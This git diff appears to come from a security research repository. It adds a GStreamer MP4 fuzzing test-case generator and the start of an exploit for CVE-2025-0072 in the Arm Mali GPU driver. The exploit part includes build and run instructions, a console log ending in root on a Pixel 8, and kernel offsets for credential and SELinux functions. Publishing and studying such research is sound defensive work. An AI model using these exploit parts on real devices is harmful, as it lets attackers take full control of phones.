+/* Chapters reference */
+#define FOURCC_chap GST_MAKE_FOURCC('c','h','a','p')
+
+/* For Microsoft Wave formats embedded in quicktime, the FOURCC is
+   'm', 's', then the 16 bit wave codec id */
+#define MS_WAVE_FOURCC(codecid) GST_MAKE_FOURCC( \
+    'm', 's', ((codecid)>>8)&0xff, ((codecid)&0xff))
+
+/* MPEG Application Format , Stereo Video */
+#define FOURCC_ss01 GST_MAKE_FOURCC('s','s','0','1')
+#define FOURCC_ss02 GST_MAKE_FOURCC('s','s','0','2')
+#define FOURCC_svmi GST_MAKE_FOURCC('s','v','m','i')
+#define FOURCC_scdi GST_MAKE_FOURCC('s','c','d','i')
+
+/* Protected streams */
+#define FOURCC_encv GST_MAKE_FOURCC('e','n','c','v')
+#define FOURCC_enca GST_MAKE_FOURCC('e','n','c','a')
+#define FOURCC_enct GST_MAKE_FOURCC('e','n','c','t')
+#define FOURCC_encs GST_MAKE_FOURCC('e','n','c','s')
+#define FOURCC_sinf GST_MAKE_FOURCC('s','i','n','f')
+#define FOURCC_frma GST_MAKE_FOURCC('f','r','m','a')
+#define FOURCC_schm GST_MAKE_FOURCC('s','c','h','m')
+#define FOURCC_schi GST_MAKE_FOURCC('s','c','h','i')
+
+/* Common Encryption */
+#define FOURCC_pssh GST_MAKE_FOURCC('p','s','s','h')
+#define FOURCC_tenc GST_MAKE_FOURCC('t','e','n','c')
+#define FOURCC_cenc GST_MAKE_FOURCC('c','e','n','c')
+#define FOURCC_cbcs GST_MAKE_FOURCC('c','b','c','s')
+
+/* Audible AAX encrypted audio */
+#define FOURCC_aavd GST_MAKE_FOURCC('a','a','v','d')
+#define FOURCC_adrm GST_MAKE_FOURCC('a','d','r','m')
+
+#define FOURCC_vttc GST_MAKE_FOURCC('v','t','t','c')
+
+#define FOURCC_sbgp GST_MAKE_FOURCC('s','b','g','p')
+#define FOURCC_sgpd GST_MAKE_FOURCC('s','g','p','d')
+#define FOURCC_wvtt GST_MAKE_FOURCC('w','v','t','t')
+
+#define FOURCC_metx GST_MAKE_FOURCC('m','e','t','x')
+#define FOURCC_cstb GST_MAKE_FOURCC('c','s','t','b')
+
+
+#define QT_FLAG_CONTAINER true
+
+#include <string>
+
+struct fourcc_info {
+    uint32_t fourcc;
+    std::string
name; + size_t min_size; +}; + +const fourcc_info CONTAINER_LIST[] = { + + {FOURCC_moov, "movie", 0,}, + {FOURCC_vttc, "VTTCueBox 14496-30", 0}, + {FOURCC_clip, "clipping", 0,}, + {FOURCC_trak, "track", 0,}, + {FOURCC_udta, "user data", 0,}, + {FOURCC_matt, "track matte", 0,}, + {FOURCC_edts, "edit", 0,}, + {FOURCC_tref, "track reference", 0,}, + {FOURCC_imap, "track input map", 0,}, + {FOURCC_mdia, "media", 0}, + {FOURCC_minf, "media information", 0}, + {FOURCC_gmhd, "base media information header", 0}, + {FOURCC_dinf, "data information", 0}, + {FOURCC_stbl, "sample table", 0}, + {FOURCC_cmov, "compressed movie", 0}, + {FOURCC_mhdr, "mhdr", 0,}, + {FOURCC_jp2h, "jp2h", 0,}, + {FOURCC_wave, "wave", 0}, + {FOURCC_appl, "appl", 0}, + {FOURCC_cfhd, "cfhd", 0}, + {FOURCC_hnti, "hnti", 0}, + {FOURCC_ilst, "ilst", 0,}, + {FOURCC__nam, "Name", 0,}, + {FOURCC_titl, "Title", 0,}, + {FOURCC__ART, "Artist", 0,}, + {FOURCC_aART, "Album Artist", 0,}, + {FOURCC_auth, "Author", 0,}, + {FOURCC_perf, "Performer", 0,}, + {FOURCC__wrt, "Writer", 0,}, + {FOURCC__grp, "Grouping", 0,}, + {FOURCC__alb, "Album", 0,}, + {FOURCC_albm, "Album", 0,}, + {FOURCC__day, "Date", 0,}, + {FOURCC__cpy, "Copyright", 0,}, + {FOURCC__cmt, "Comment", 0,}, + {FOURCC__des, "Description", 0,}, + {FOURCC_desc, "Description", 0,}, + {FOURCC_dscp, "Description", 0,}, + {FOURCC__lyr, "Lyrics", 0,}, + {FOURCC__req, "Requirement", 0,}, + {FOURCC__enc, "Encoder", 0,}, + {FOURCC_gnre, "Genre", 0,}, + {FOURCC_trkn, "Track Number", 0,}, + {FOURCC_disc, "Disc Number", 0,}, + {FOURCC_disk, "Disc Number", 0,}, + {FOURCC_cprt, "Copyright", 0,}, + {FOURCC_cpil, "Compilation", 0,}, + {FOURCC_pgap, "Gapless", 0,}, + {FOURCC_pcst, "Podcast", 0,}, + {FOURCC_tmpo, "Tempo", 0,}, + {FOURCC_covr, "Cover", 0,}, + {FOURCC_sonm, "Sort Title", 0,}, + {FOURCC_soal, "Sort Album", 0,}, + {FOURCC_soar, "Sort Artist", 0,}, + {FOURCC_soaa, "Sort Album Artist", 0,}, + {FOURCC_soco, "Sort Composer", 0,}, + {FOURCC_sosn, "Sort TV Show", 0,}, + {FOURCC_tvsh, "TV Show", 0,}, + {FOURCC_tven, "TV Episode ID", 0,}, + {FOURCC_tvsn, "TV Season Number", 0,}, + {FOURCC_tves, "TV Episode Number", 0,}, + {FOURCC_keyw, "Keywords", 0,}, + {FOURCC_kywd, "Keywords", 0,}, + {FOURCC__too, "Encoder", 0,}, + {FOURCC__swr, "Application Name", 0,}, + {FOURCC_____, "----", 0,}, + {FOURCC_rmra, "rmra", 0,}, + {FOURCC_rmda, "rmda", 0,}, + {FOURCC__gen, "Custom Genre", 0,}, + {FOURCC_mfra, "movie fragment random access", 0,}, + {FOURCC_moof, "movie fragment", 0,}, + {FOURCC_traf, "track fragment", 0,}, + {FOURCC_mvex, "mvex", 0,}, + {FOURCC_sinf, "protection scheme information", 0}, + {FOURCC_schi, "scheme information", 0}, + + {FOURCC_stsd, "sample description", 16,}, + + {FOURCC_mp4a, "mp4a", 72,}, + {FOURCC_alac, "alac", 72,}, + {FOURCC_fLaC, "fLaC", 72,}, + {FOURCC_aavd, "AAX encrypted audio", 72}, + {FOURCC_opus, "opus", 72,}, + + {FOURCC_mp4v, "mp4v", 86,}, + {FOURCC_avc1, "AV codec configuration v1", 86}, + {FOURCC_avc3, "AV codec configuration v3", 86}, + {FOURCC_hvc1, "HEVC codec configuration", 86}, + {FOURCC_hev1, "HEVC codec configuration", 86}, + {FOURCC_dvh1, "HEVC-based Dolby Vision codec derived from hvc1 ", 86}, + {FOURCC_dvhe, "HEVC-based Dolby Vision codec derived from hev1 ", 86}, + {FOURCC_mjp2, "mjp2", 86,}, + {FOURCC_encv, "encrypted visual sample entry", 86}, + + {FOURCC_meta, "meta", 16,}, + + {FOURCC_mp4s, "VOBSUB codec configuration", 16}, + + {FOURCC_XiTh, "XiTh", 98}, + + {FOURCC_in24, "in24", 52,}, + + {FOURCC_enca, "encrypted audio sample entry", 54} +}; + + 
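+/* For entries above with a non-zero min_size (e.g. 16 for 'stsd', 86 for
+ * the video sample entries), the box is assumed to carry at least that many
+ * bytes of payload before any child boxes. */
+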
+// 3rd field = min_size (padding, in bytes)
+const fourcc_info FOURCC_LIST[] = {
+
+  {FOURCC_crgn, "clipping region", 0,},
+  {FOURCC_kmat, "compressed matte", 0,},
+  {FOURCC_elst, "edit list", 0,},
+  {FOURCC_load, "track load settings", 0,},
+  {FOURCC___in, "track input", 0,},  /* special container */
+  {FOURCC___ty, "input type", 0,},
+  {FOURCC_mdhd, "media header", 0,},
+  {FOURCC_hdlr, "handler reference", 0,},
+  {FOURCC_vmhd, "video media information", 0,},
+  {FOURCC_smhd, "sound media information", 0},
+  {FOURCC_nmhd, "null media information", 0},
+  {FOURCC_gmin, "base media info", 0,},
+  {FOURCC_dref, "data reference", 0,},
+
+  {FOURCC_stts, "time-to-sample", 0,},
+  {FOURCC_stps, "partial sync sample", 0,},
+  {FOURCC_stss, "sync sample", 0,},
+  {FOURCC_stsc, "sample-to-chunk", 0,},
+  {FOURCC_stsz, "sample size", 0,},
+  {FOURCC_stco, "chunk offset", 0,},
+  {FOURCC_co64, "64-bit chunk offset", 0,},
+  {FOURCC_vide, "video media", 0},
+  {FOURCC_dcom, "compressed data", 0,},
+  {FOURCC_cmvd, "compressed movie data", 0,},
+  {FOURCC_hint, "hint", 0,},
+
+
+
+  {FOURCC_colr, "colr", 0,},
+  {FOURCC_pasp, "pasp", 0,},
+  {FOURCC_clap, "clap", 0,},
+  {FOURCC_tapt, "tapt", 0,},
+  {FOURCC_ihdr, "ihdr", 0,},
+  {FOURCC_fiel, "fiel", 0,},
+  {FOURCC_jp2x, "jp2x", 0,},
+
+  {FOURCC_dfLa, "dfLa", 0,},
+
+  {FOURCC_dops, "dOps", 0,},
+  {FOURCC_esds, "esds", 0},
+  {FOURCC_rtp_, "rtp ", 0,},
+  {FOURCC_sdp_, "sdp ", 0,},
+
+  {FOURCC_data, "data", 0,},
+  {FOURCC_free, "free", 0,},
+  {FOURCC_skip, "skip", 0,},
+  {FOURCC_SVQ3, "SVQ3", 0,},
+  {FOURCC_rdrf, "rdrf", 0,},
+  {FOURCC_ctts, "Composition time to sample", 0,},
+  {FOURCC_cslg, "Composition Shift Least Greatest", 0,},
+
+  {FOURCC_XdxT, "XdxT", 0},
+  {FOURCC_loci, "loci", 0},
+  {FOURCC_clsf, "clsf", 0},
+  {FOURCC_tfra, "track fragment random access", 0,},
+  {FOURCC_mfro, "movie fragment random access offset", 0,},
+  {FOURCC_mfhd, "movie fragment header", 0,},
+  {FOURCC_tfhd, "track fragment header", 0,},
+  {FOURCC_sdtp, "independent and disposable samples", 0,},
+  {FOURCC_trun, "track fragment run", 0,},
+  {FOURCC_mdat, "movie data", 0,},
+  {FOURCC_trex, "track extends", 0,},
+  {FOURCC_mehd, "movie extends header", 0,},
+  {FOURCC_ovc1, "ovc1", 0},
+  {FOURCC_owma, "owma", 0},
+  {FOURCC_avcC, "AV codec configuration container", 0},
+
+  {FOURCC_dva1, "AVC-based Dolby Vision derived from avc1", 0},
+  {FOURCC_dvav, "AVC-based Dolby Vision derived from avc3", 0},
+  {FOURCC_ai12, "AVC-Intra 100M 1080p25/50", 0},
+  {FOURCC_ai13, "AVC-Intra 100M 1080p24/30/60", 0},
+  {FOURCC_ai15, "AVC-Intra 100M 1080i50", 0},
+  {FOURCC_ai16, "AVC-Intra 100M 1080i60", 0},
+  {FOURCC_ai1p, "AVC-Intra 100M 720p24/30/60", 0},
+  {FOURCC_ai1q, "AVC-Intra 100M 720p25/50", 0},
+  {FOURCC_ai52, "AVC-Intra 50M 1080p25/50", 0},
+  {FOURCC_ai53, "AVC-Intra 50M 1080p24/30/60", 0},
+  {FOURCC_ai55, "AVC-Intra 50M 1080i50", 0},
+  {FOURCC_ai56, "AVC-Intra 50M 1080i60", 0},
+  {FOURCC_ai5p, "AVC-Intra 50M 720p24/30/60", 0},
+  {FOURCC_ai5q, "AVC-Intra 50M 720p25/50", 0},
+
+
+
+  {FOURCC_hvcC, "HEVC codec configuration container", 0},
+
+
+  {FOURCC_dvcC, "HEVC-based Dolby Vision codec configuration container", 0},
+  {FOURCC_tfdt, "Track fragment decode time", 0,},
+  {FOURCC_chap, "Chapter Reference", 0},
+  {FOURCC_btrt, "Bitrate information", 0},
+  {FOURCC_frma, "Audio codec format", 0},
+  {FOURCC_name, "name", 0},
+  {FOURCC_mean, "mean", 0},
+  {FOURCC_svmi, "Stereoscopic Video Media Information", 0,},
+  {FOURCC_scdi, "Stereoscopic Camera and Display Information", 0,},
+  {FOURCC_saiz, "sample auxiliary information sizes", 0},
+  {FOURCC_saio, "sample auxiliary information offsets", 0},
+
+
+  {FOURCC_enct, "encrypted text sample entry", 0},
+  {FOURCC_encs, "encrypted system sample entry", 0},
+  {FOURCC_frma, "original format", 0},
+  {FOURCC_schm, "scheme type", 0},
+  {FOURCC_pssh, "protection system specific header", 0},
+  {FOURCC_tenc, "track encryption", 0},
+  {FOURCC_sgpd, "sample group description", 0},
+  {FOURCC_sbgp, "sample to group", 0},
+  {FOURCC_stpp, "XML subtitle sample entry", 0},
+  {FOURCC_wvtt, "WebVTT subtitle sample entry", 0},
+  {FOURCC_clcp, "Closed Caption", 0},
+  {FOURCC_av01, "AV1 Sample Entry", 0},
+  {FOURCC_av1C, "AV1 Codec Configuration", 0},
+  {FOURCC_av1f, "AV1 Forward Key Frame sample group entry", 0},
+  {FOURCC_av1m, "AV1 Multi-Frame sample group entry", 0},
+  {FOURCC_av1s, "AV1 S-Frame sample group entry", 0},
+  {FOURCC_av1M, "AV1 Metadata sample group entry", 0},
+
+  {FOURCC_adrm, "AAX DRM key data", 0},
+  {FOURCC_mvhd, "movie header", 0,},
+  {FOURCC_metx, "XML MetaData Sample Entry", 0},
+  {FOURCC_cstb, "Correct Start Time Box", 0},
+  {FOURCC_ctab, "color table", 0,},
+  {FOURCC_tkhd, "track header", 0,}
+};
+
+const uint8_t CONTAINER_LIST_SIZE = sizeof(CONTAINER_LIST)/sizeof(CONTAINER_LIST[0]);
+const uint8_t FOURCC_LIST_SIZE = sizeof(FOURCC_LIST)/sizeof(FOURCC_LIST[0]);
diff --git a/Fuzzing/GStreamer/labeler/labeler.h b/Fuzzing/GStreamer/labeler/labeler.h
new file mode 100644
index 0000000..4d3c1e3
--- /dev/null
+++ b/Fuzzing/GStreamer/labeler/labeler.h
@@ -0,0 +1,11 @@
+#pragma once
+
+#include <string>
+
+class Labeler{
+
+  protected:
+
+    std::string priv_name;
+
+};
\ No newline at end of file
diff --git a/Fuzzing/GStreamer/main.cc b/Fuzzing/GStreamer/main.cc
new file mode 100644
index 0000000..ed48046
--- /dev/null
+++ b/Fuzzing/GStreamer/main.cc
@@ -0,0 +1,114 @@
+#include <cstdint>
+#include <cstdlib>
+#include <iostream>
+#include <string>
+
+#include <filesystem>
+#include <unistd.h>
+
+#include <getopt.h>
+
+#include "tree.h"
+#include "aux.h"
+
+
+void print_help(char *argv[]) {
+
+  std::cout << "Usage: " << argv[0] << " -o output_dir" << std::endl;
+
+  std::cout << "\n";
+  std::cout << "Options:" << std::endl;
+  std::cout << "\t -n num_nodes: number of nodes in the tree. Default: 8" << std::endl;
+  std::cout << "\t -c corpus_size: number of testcases to generate. Default: 10" << std::endl;
+
+  std::cout << std::endl;
+  std::cout << "\t -o output_dir: output directory" << std::endl;
+
+}
+
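+/* Example invocation (illustrative):
+ *
+ *   ./generator -n 12 -c 100 -o corpus
+ *
+ * writes 100 testcases named corpus/out_0 .. corpus/out_99, each serialized
+ * from a random tree of 12 boxes. */
+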
Default: 10" << std::endl; + + std::cout << std::endl; + std::cout << "\t -o output_dir: output directory" << std::endl; + +} + +int main(int argc, char *argv[]) { + + if(argc < 2){ + print_help(argv); + exit(EXIT_FAILURE); + } + + std::string output_dir = ""; + + uint32_t num_children = 0; + uint32_t max_depth = 0; + + uint32_t num_nodes = 8; + + uint32_t corpus_size = 10; + + int ch; + while ((ch = getopt(argc, argv, "n:c:o:")) != -1) { + + switch (ch) { + + case 'n': { + num_nodes = std::stoi(optarg); + break; + } + + case 'c': { + corpus_size = std::stoi(optarg); + break; + } + + case 'o': { + output_dir = optarg; + break; + } + + default: + print_help(argv); + exit(EXIT_FAILURE); + } + } + + if(output_dir == ""){ + std::cerr << "Output directory not specified" << std::endl; + exit(EXIT_FAILURE); + } + + std::filesystem::path dir = output_dir; + if(!std::filesystem::exists(dir)){ + std::cerr << "Output directory does not exist" << std::endl; + exit(EXIT_FAILURE); + } + + if(num_nodes < 1 || num_nodes > 20){ + std::cerr << "Number of nodes must be between 1 and 20" << std::endl; + exit(EXIT_FAILURE); + } + + std::cout << "Generating " << corpus_size << " testcases with " << num_nodes << " nodes" << std::endl; + + for(int i=0; i < corpus_size; i++){ + + RandomTree tree(num_nodes); + + MP4_labeler labeler(&tree); + + #ifdef DEBUG + std::string dot = tree.dot_format(); + std::cout << dot << std::endl; + #endif + + + std::string file_content = labeler.serialize(); + + std::string output_file = output_dir + "/out_" + std::to_string(i); + + if(!write_to_file(file_content, output_file)){ + std::cerr << "Error writing to file" << std::endl; + exit(EXIT_FAILURE); + } + + } + + +} + diff --git a/Fuzzing/GStreamer/makefile b/Fuzzing/GStreamer/makefile new file mode 100644 index 0000000..4fd2131 --- /dev/null +++ b/Fuzzing/GStreamer/makefile @@ -0,0 +1,9 @@ +CPPFLAGS = -g -O2 + +SRC = tree.cc labeler/MP4.cc +INC = ./ ./labeler + +all: generator + +generator: $(SRC) main.cc + g++ main.cc -I./ -I./labeler $(SRC) $(CPPFLAGS) -o generator diff --git a/Fuzzing/GStreamer/tree.cc b/Fuzzing/GStreamer/tree.cc new file mode 100644 index 0000000..bef9fb0 --- /dev/null +++ b/Fuzzing/GStreamer/tree.cc @@ -0,0 +1,137 @@ +#include +#include +#include +#include + +#include + +#include "tree.h" +#include "aux.h" + + +Node::Node(uint32_t in_id, int32_t in_parent_id, uint32_t in_depth) { + + this->id = in_id; + + this->parent_id = in_parent_id; + + this->depth = in_depth; +} + +const std::vector& Node::children() const{ + + return this->prv_children; +} + +std::string Node::get_label() const{ + + return this->label; +} + +uint32_t Node::get_id() const{ + + return this->id; +} + +void Node::set_label(const std::string &in_label){ + + this->label = in_label; +} + + + + +uint32_t RandomTree::new_node(int32_t parent_id, uint32_t depth){ + + uint32_t new_node_id = this->num_nodes; + + this->nodes.emplace_back(new_node_id, parent_id, depth); + + if(parent_id != -1){ + this->nodes[parent_id].prv_children.emplace_back(new_node_id); + } + + if(this->levels.size() <= depth){ + this->levels.resize(depth+1); + this->tree_depth = depth; + } + + this->levels[depth].emplace_back(new_node_id); + + this->num_nodes++; + + return new_node_id; + +} + + + +RandomTree::RandomTree(uint32_t total_nodes){ + + uint32_t curr_level = 0; + + //Root node + new_node(-1, curr_level); + + curr_level++; + + uint32_t rem_nodes = total_nodes - 1; + + uint32_t current_node = 0; + + while(rem_nodes > 0){ + + uint32_t num_children = rand_uint32(1, 
+RandomTree::RandomTree(uint32_t total_nodes){
+
+  uint32_t curr_level = 0;
+
+  //Root node
+  new_node(-1, curr_level);
+
+  curr_level++;
+
+  uint32_t rem_nodes = total_nodes - 1;
+
+  while(rem_nodes > 0){
+
+    uint32_t num_children = rand_uint32(1, rem_nodes);
+
+    uint32_t min_value = this->levels[curr_level-1].front();
+    uint32_t max_value = this->levels[curr_level-1].back();
+
+    for(uint32_t i = 0; i < num_children; i++){
+
+      uint32_t parent_id = rand_uint32(min_value, max_value);
+
+      new_node(parent_id, curr_level);
+    }
+
+    rem_nodes -= num_children;
+
+    curr_level++;
+  }
+
+}
+
+Node & RandomTree::get_node(uint32_t node_id){
+
+  return this->nodes[node_id];
+}
+
+size_t RandomTree::size() const{
+
+  return this->nodes.size();
+}
+
+std::string RandomTree::dot_format() const{
+
+  std::ostringstream output;
+
+  output << "digraph tree {\n";
+
+  for (const auto& node : this->nodes) {
+
+    output << "  " << node.id << " [label=\"" << node.label << "\"];\n";
+
+    if (node.parent_id != -1) {
+
+      output << "  " << node.parent_id << " -> " << node.id << ";\n";
+    }
+
+  }
+
+  output << "}\n";
+
+  return output.str();
+}
diff --git a/Fuzzing/GStreamer/tree.h b/Fuzzing/GStreamer/tree.h
new file mode 100644
index 0000000..b036f8d
--- /dev/null
+++ b/Fuzzing/GStreamer/tree.h
@@ -0,0 +1,64 @@
+#pragma once
+
+#include <cstdint>
+#include <string>
+
+#include <vector>
+
+class Node{
+
+  friend class RandomTree;
+
+  private:
+
+    int32_t id = -1;
+    int32_t parent_id = -1;
+    std::vector<uint32_t> prv_children = {};
+    int32_t depth = -1;
+
+    std::string label;
+
+
+  public:
+
+    Node(uint32_t in_id, int32_t in_parent_id, uint32_t in_depth);
+
+    const std::vector<uint32_t>& children() const;
+
+    std::string get_label() const;
+
+    uint32_t get_id() const;
+
+    void set_label(const std::string &in_label);
+
+};
+
+
+class RandomTree{
+
+  friend class Labeler;
+
+  private:
+
+    std::vector<Node> nodes;
+
+    std::vector<std::vector<uint32_t>> levels;
+
+    uint32_t num_nodes = 0;
+
+    uint32_t tree_depth = 0;
+
+    uint32_t new_node(int32_t parent_id, uint32_t depth);
+
+  public:
+
+    RandomTree(uint32_t total_nodes);
+
+
+    Node & get_node(uint32_t node_id);
+
+    size_t size() const;
+
+    std::string dot_format() const;
+
+};
\ No newline at end of file
diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/README.md b/SecurityExploits/Android/Mali/CVE-2025-0072/README.md
new file mode 100644
index 0000000..e0662bd
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE-2025-0072/README.md
@@ -0,0 +1,29 @@
+## Exploit for CVE-2025-0072
+
+The write-up can be found [here](https://github.blog/security/vulnerability-research/bypassing-mte-with-cve-2025-0072). This is a bug in the Arm Mali kernel driver that I reported in December 2024. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
+
+The exploit was tested on the Google Pixel 8 with the November 2024 patch (`AP3A.241105.007`). It needs to be compiled against the OpenCL headers and linked with the OpenCL library `libGLES_mali.so`. The library can be found on a Pixel 8 device at `/vendor/lib64/egl/libGLES_mali.so`, and the OpenCL header files can be found in KhronosGroup's [OpenCL-Headers repository](https://github.com/KhronosGroup/OpenCL-Headers). The specific headers I used were from the [v2023.04.17](https://github.com/KhronosGroup/OpenCL-Headers/releases/tag/v2023.04.17) release, although other versions should also work. For reference, I used the following command to compile with clang from NDK r26b:
+
+```
+android-ndk-r26b/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android34-clang -DSHELL -DCL_TARGET_OPENCL_VERSION=300 -I. -L. mali_userio.c mem_read_write.c mempool_utils.c -lGLES_mali -o mali_userio
+```
+
+At runtime the exploit needs to locate `libGLES_mali.so`, which can be done by setting `LD_LIBRARY_PATH` to `/vendor/lib64/egl`. The exploit rarely fails, and even when it does, it does not normally corrupt or crash the system, so it can simply be rerun. If successful, it should disable SELinux and gain root.
+
+```
+shiba:/data/local/tmp $ LD_LIBRARY_PATH=/vendor/lib64/egl ./mali_userio
+gpu_addr 5ffff94000
+group_handle 1 cookie 30000
+group_handle 1 cookie 30000
+found entry 4000093deaf443 at 384 in page 0
+overwrite addr : 5ffff00c60 c60
+overwrite addr : 5fffb00c60 c60
+overwrite addr : 5ffff00f40 f40
+overwrite addr : 5fffb00f40 f40
+run enforce
+result 50
+clean up
+shiba:/ #
+```
+
+To test it with MTE enabled, follow [these instructions](https://outflux.net/blog/archives/2023/10/26/enable-mte-on-pixel-8/) to enable kernel MTE.
diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/firmware_offsets.h b/SecurityExploits/Android/Mali/CVE-2025-0072/firmware_offsets.h
new file mode 100644
index 0000000..b15f888
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE-2025-0072/firmware_offsets.h
@@ -0,0 +1,16 @@
+#ifndef FIRMWARE_OFFSETS_H
+#define FIRMWARE_OFFSETS_H
+
+/* Offsets for the Pixel 8 November 2024 patch (AP3A.241105.007),
+ * hence the _2411 suffix. */
+#define AVC_DENY_2411 0x839c60
+
+#define SEL_READ_ENFORCE_2411 0x84bf40
+
+#define INIT_CRED_2411 0x280c948
+
+#define COMMIT_CREDS_2411 0x174f38
+
+#define ADD_COMMIT_2411 0x913ce108 //add x8, x8, #0xf38
+
+#define ADD_INIT_2411 0x91252000 //add x0, x0, #0x948
+
+#endif
diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/log_utils.h b/SecurityExploits/Android/Mali/CVE-2025-0072/log_utils.h
new file mode 100644
index 0000000..0a4172c
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE-2025-0072/log_utils.h
@@ -0,0 +1,11 @@
+#ifndef LOG_UTILS_H
+#define LOG_UTILS_H
+
+#ifdef SHELL
+#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
+#else
+#include <android/log.h>
+#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
+#endif
+
+#endif
diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mali_base_common_kernel.h b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_base_common_kernel.h
new file mode 100644
index 0000000..23bed51
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_base_common_kernel.h
@@ -0,0 +1,228 @@
+/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+/*
+ *
+ * (C) COPYRIGHT 2022 ARM Limited. All rights reserved.
+ *
+ * This program is free software and is provided to you under the terms of the
+ * GNU General Public License version 2 as published by the Free Software
+ * Foundation, and any use by you of this program is subject to the terms
+ * of such GNU license.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, you can access it online at
+ * http://www.gnu.org/licenses/gpl-2.0.html.
+ *
+ */
+
+#ifndef _UAPI_BASE_COMMON_KERNEL_H_
+#define _UAPI_BASE_COMMON_KERNEL_H_
+
+#include <linux/types.h>
+#include "mali_base_kernel.h"
+
+#define LOCAL_PAGE_SHIFT 12
+
+#define BASE_GPU_NUM_TEXTURE_FEATURES_REGISTERS 4
+
+/* Memory allocation, access/hint flags & mask.
+ *
+ * See base_mem_alloc_flags.
+ */ + +/* IN */ +/* Read access CPU side + */ +#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0) + +/* Write access CPU side + */ +#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1) + +/* Read access GPU side + */ +#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2) + +/* Write access GPU side + */ +#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3) + +/* Execute allowed on the GPU side + */ +#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4) + +/* Will be permanently mapped in kernel space. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5) + +/* The allocation will completely reside within the same 4GB chunk in the GPU + * virtual space. + * Since this flag is primarily required only for the TLS memory which will + * not be used to contain executable code and also not used for Tiler heap, + * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags. + */ +#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6) + +/* Userspace is not allowed to free this memory. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7) + +/* Grow backing store on GPU Page Fault + */ +#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9) + +/* Page coherence Outer shareable, if available + */ +#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10) + +/* Page coherence Inner shareable + */ +#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11) + +/* IN/OUT */ +/* Should be cached on the CPU, returned if actually cached + */ +#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12) + +/* IN/OUT */ +/* Must have same VA on both the GPU and the CPU + */ +#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13) + +/* OUT */ +/* Must call mmap to acquire a GPU address for the allocation + */ +#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14) + +/* IN */ +/* Page coherence Outer shareable, required. + */ +#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15) + +/* Protected memory + */ +#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16) + +/* Not needed physical memory + */ +#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17) + +/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the + * addresses to be the same + */ +#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18) + +/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu + * mode. Some components within the GPU might only be able to access memory + * that is GPU cacheable. Refer to the specific GPU implementation for more + * details. The 3 shareability flags will be ignored for GPU uncached memory. + * If used while importing USER_BUFFER type memory, then the import will fail + * if the memory is not aligned to GPU and CPU cache line width. + */ +#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21) + +/* + * Bits [22:25] for group_id (0~15). + * + * base_mem_group_id_set() should be used to pack a memory group ID into a + * base_mem_alloc_flags value instead of accessing the bits directly. + * base_mem_group_id_get() should be used to extract the memory group ID from + * a base_mem_alloc_flags value. 
+ */
+#define BASEP_MEM_GROUP_ID_SHIFT 22
+#define BASE_MEM_GROUP_ID_MASK ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT)
+
+/* Must do CPU cache maintenance when imported memory is mapped/unmapped
+ * on GPU. Currently applicable to dma-buf type only.
+ */
+#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26)
+
+/* OUT */
+/* Kernel side cache sync ops required */
+#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28)
+
+/* Number of bits used as flags for base memory management
+ *
+ * Must be kept in sync with the base_mem_alloc_flags flags
+ */
+#define BASE_MEM_FLAGS_NR_BITS 30
+
+/* A mask for all output bits, excluding IN/OUT bits.
+ */
+#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP
+
+/* A mask for all input bits, including IN/OUT bits.
+ */
+#define BASE_MEM_FLAGS_INPUT_MASK \
+	(((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK)
+
+/* Special base mem handles.
+ */
+#define BASEP_MEM_INVALID_HANDLE (0ul)
